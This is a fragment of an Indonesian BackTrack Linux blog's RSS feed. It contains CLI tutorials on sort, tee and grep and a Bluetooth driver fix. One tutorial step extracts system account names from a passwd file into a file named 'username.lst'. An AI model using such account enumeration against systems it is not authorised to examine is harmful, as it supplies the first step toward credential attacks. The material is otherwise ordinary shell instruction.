background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;messagebus&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;mysql&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;news&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;nobody&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;postgres&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;proxy&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;pulse&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;root&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;rtkit&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;snort&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;sshd&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;statd&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;sync&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;sys&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;syslog&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;usbmux&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;uucp&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;www-data&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-MP9Trjhvbao/TyoEov2WwhI/AAAAAAAABMM/tJLmcVa08lc/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="252" src="http://2.bp.blogspot.com/-MP9Trjhvbao/TyoEov2WwhI/AAAAAAAABMM/tJLmcVa08lc/s320/4.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;span class="Apple-style-span" style="color: cyan; font-family: monospace;"&gt;&lt;i&gt;menggunakan perintah sort&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: cyan; font-size: large;"&gt;6. Perintah tee&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;TEE adalah perintah untuk menyimpan output dari sebuah perintah. Contoh:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;Command :&lt;/span&gt;&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;root@revolution:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;/tmp&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;# ifconfig wlan0 | tee &amp;gt; ipaddress&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;root@revolution:&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;/tmp&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime; line-height: 18px;"&gt;#&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime; line-height: 18px;"&gt;&amp;nbsp;cat ipaddress&amp;nbsp;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;wlan0 &amp;nbsp; &amp;nbsp; Link encap:Ethernet &amp;nbsp;HWaddr e0:b9:a5:9d:37:e9 &amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; inet addr:192.168.1.4 &amp;nbsp;Bcast:192.168.1.255 &amp;nbsp;Mask:255.255.255.0&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; inet6 addr: fe80::e2b9:a5ff:fe9d:37e9/64 Scope:Link&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; UP BROADCAST RUNNING MULTICAST &amp;nbsp;MTU:1500 &amp;nbsp;Metric:1&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; RX packets:12504 errors:0 dropped:0 overruns:0 frame:0&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; TX packets:13018 errors:0 dropped:0 overruns:0 carrier:0&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; collisions:0 txqueuelen:1000&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; RX bytes:7044888 (7.0 MB) &amp;nbsp;TX bytes:3387860 (3.3 MB)&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Saya akan membuat perintah ifconfig wlan0, kemudian menyimpan hasil perintah ifconfig wlan0 dengan perintah tee dan menamai file tersebut dengan nama ipaddress.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Contoh:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: white; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;Command :&lt;/span&gt;&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;root@revolution:&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;/tmp&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime; line-height: 18px;"&gt;#&lt;/span&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;&amp;nbsp;awk -F ':' '{print $1}' passwd &amp;nbsp;| sort | tee &amp;gt; username.lst&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-cTDdODoPu0I/TyoEy7AFkuI/AAAAAAAABMU/t4W5MtLoFUI/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="252" src="http://2.bp.blogspot.com/-cTDdODoPu0I/TyoEy7AFkuI/AAAAAAAABMU/t4W5MtLoFUI/s320/5.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Sebelumnya kita sudah menggunakan perintah sort, kali ini kita akan menyimpan hasil output perintah sort dengan nama username.lst&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Selesai. Kamu sudah memiliki file username.lst yang berisi tentang user yang ada di linux kamu. =)&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;created by : &lt;span class="Apple-style-span" style="color: red;"&gt;red-dragon&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4322924474312123143-72196900716035625?l=www.root-bt.co.cc' alt='' /&gt;&lt;/div&gt;</description><link>http://www.root-bt.co.cc/2012/02/do-more-with-cli-part-2.html</link><author>noreply@blogger.com (Double Dragon)</author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/-7MwiuWQ3xZg/TyoECMgwglI/AAAAAAAABL0/rgK2g8KLb3o/s72-c/1.png' height='72' width='72'/><thr:total>2</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-4322924474312123143.post-1405243972566440407</guid><pubDate>Wed, 01 Feb 2012 15:43:00 +0000</pubDate><atom:updated>2012-02-02T07:34:56.471+07:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>bug</category><category domain='http://www.blogger.com/atom/ns#'>BackTrack</category><category domain='http://www.blogger.com/atom/ns#'>driver</category><title>FIX hci0 command tx timeout</title><description>&lt;span class="fullpost"&gt;Biasanya sebelum kita login ke BackTrack, ada peringatan dari DMESG yang isinya:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;[138209.666632] usbcore: registered new interface driver btusb&lt;br /&gt;[138214.844410] hci_cmd_task: hci0 command tx timeout&lt;br /&gt;[138219.848340] hci_cmd_task: hci0 command tx timeout&lt;br /&gt;[138224.853676] hci_cmd_task: hci0 command tx timeout&lt;br /&gt;[138229.856417] hci_cmd_task: hci0 command tx timeout&lt;br /&gt;[138234.860719] hci_cmd_task: hci0 command tx timeout&lt;br /&gt;[138239.960585] hci_cmd_task: hci0 command tx timeout&lt;br /&gt;[138240.464277] bluetoothd[5133]: segfault at 3 ip b7e39938 sp bfb8fcc8 error &lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;Ini terjadi karena bluetooth stack driver nggak bisa UP. BackTrack di versi 5 R1memiliki kernel 2.6.39-4 yang tidak mempunyai patch kernel bluetooth. Makanya peringatan:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost" style="font-size: large;"&gt;hci0 command tx timeout&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;akan selalu ada tiap kali kita booting.&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;/span&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;Untuk menghindari hciconfig membawa interface bluetooth ini UP, kita harus memberikan sebuah perintah yang berjalan di level rc. Tambahkan baris:&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost" style="font-size: large;"&gt;hciconfig hci0 down&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;sebelum perintah:&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost" style="font-size: large;"&gt;exit 0&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;Di file:&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost" style="font-size: large;"&gt;/etc/rc.local&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;span class="fullpost"&gt;SCREEN-SHOT&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-IAzsNjRwJZg/Tylc1LbZoYI/AAAAAAAABLs/VHqX8-zadho/s1600/hci0-command-tx-timeout-FIX.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="207" src="http://2.bp.blogspot.com/-IAzsNjRwJZg/Tylc1LbZoYI/AAAAAAAABLs/VHqX8-zadho/s400/hci0-command-tx-timeout-FIX.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;Setelah menambahkan baris tersebut, kita bisa reboot untuk melihat hasilnya (=&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;blusp10it &lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt; &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4322924474312123143-1405243972566440407?l=www.root-bt.co.cc' alt='' /&gt;&lt;/div&gt;</description><link>http://www.root-bt.co.cc/2012/02/fix-hci0-command-tx-timeout.html</link><author>noreply@blogger.com (Double Dragon)</author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/-IAzsNjRwJZg/Tylc1LbZoYI/AAAAAAAABLs/VHqX8-zadho/s72-c/hci0-command-tx-timeout-FIX.png' height='72' width='72'/><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-4322924474312123143.post-5401478744343149953</guid><pubDate>Sat, 28 Jan 2012 05:37:00 +0000</pubDate><atom:updated>2012-01-28T12:37:30.054+07:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>Tutorial</category><category domain='http://www.blogger.com/atom/ns#'>awk</category><category domain='http://www.blogger.com/atom/ns#'>grep</category><category domain='http://www.blogger.com/atom/ns#'>CLI</category><category domain='http://www.blogger.com/atom/ns#'>sed</category><title>Do More With CLI [Part 1]</title><description>Linux memang identik dengan CLI (Command Line Interpreter), pengguna yang manja akan lebih menyukai menggunakan kursornya untuk melakukan setiap hal, bahkan hal yang mudah. Dan ini terjadi hampir terjadi pada setiap pengguna &amp;lt;&amp;lt; back | track yang notabene adalah mantan pengguna windows. "The real hacker is not using GUI"!&lt;span class="fullpost"&gt; &lt;/span&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Oke, pertanyaan yang sering keluar adalah: "Bagaimana cara melatih penggunaan CLI?" Anda bisa mempelajarinya dari hal terkecil. Yaitu perintah grep. Grep berfungsi untuk mencari string yang dikehendaki. Ini sama dengan perintah find text pada windows. Kali ini saya akan memberikan 3 Tutorial sekaligus, yaitu tutorial grep, tutorial awk, dan tutorial sed. Dan anda bisa mencobanya sendiri.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Preparation:&lt;/div&gt;&lt;div&gt;[*] Terminal &lt;i&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;terletak pada Applications -&amp;nbsp;Accessories - Terminal&lt;/span&gt;&lt;/i&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Goal:&lt;/div&gt;&lt;div&gt;[*] Menampilkan IP address pada terminal&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Walkthrough:&lt;/div&gt;&lt;div&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: cyan; font-size: large;"&gt;1. Grep&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Buka terminal, lalu masukan perintah&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;Command:&lt;/span&gt;&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;root@revolution&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;/&lt;/span&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;# ifconfig wlan0&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Kita akan menampilkan konfigurasi IP pada device wlan0 (WiFi Device)&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-IrC2OyERSV8/TyOI_7xQ4oI/AAAAAAAABLM/8RJsmO9NgO8/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="178" src="http://3.bp.blogspot.com/-IrC2OyERSV8/TyOI_7xQ4oI/AAAAAAAABLM/8RJsmO9NgO8/s320/1.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;&lt;span class="Apple-style-span" style="color: lime;"&gt;Output:&lt;/span&gt;&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; 